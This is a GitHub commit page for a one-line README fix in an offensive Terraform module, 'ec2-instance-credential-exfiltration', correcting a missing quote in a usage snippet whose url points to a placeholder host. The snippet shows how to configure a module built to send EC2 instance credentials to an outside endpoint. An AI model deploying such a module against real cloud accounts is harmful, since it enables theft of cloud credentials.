We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 112e69c commit 6879cf2Copy full SHA for 6879cf2
README.md
@@ -14,7 +14,7 @@ module "ec2_instance_credential_exfiltration" {
14
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
15
16
subnet_id = "subnet-0a4a1cc04"
17
- url = "http://0.0.0.0/
+ url = "http://0.0.0.0/"
18
iam_role= "ec2-instance-role"
19
iam_instance_profile = "ec2-instance-profile"
20
}
0 commit comments